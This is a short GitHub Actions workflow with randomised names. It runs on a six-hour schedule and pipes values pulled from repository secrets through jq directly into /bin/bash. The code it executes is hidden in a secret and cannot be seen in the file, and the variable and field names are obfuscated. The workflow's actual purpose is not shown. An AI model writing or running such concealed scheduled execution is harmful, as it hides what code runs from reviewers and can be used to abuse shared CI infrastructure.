name: lujiancheng2345

on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujiancheng2345
        env:
          hbzm352: ${{ secrets.hbzm352 }}
        run: |
          echo $hbzm352 | jq -r .gbjig9 | /bin/bash
          echo $llo571 | jq -r .zwpdn84995 | /bin/bash
          echo $yyws75 | jq -r .dhi69604 | /bin/bash
          echo $dqege28 | jq -r .s6358 | /bin/bash
          echo $cmsj95380 | jq -r .ms40680 | /bin/bash
          echo $r08 | jq -r .l9 | /bin/bash

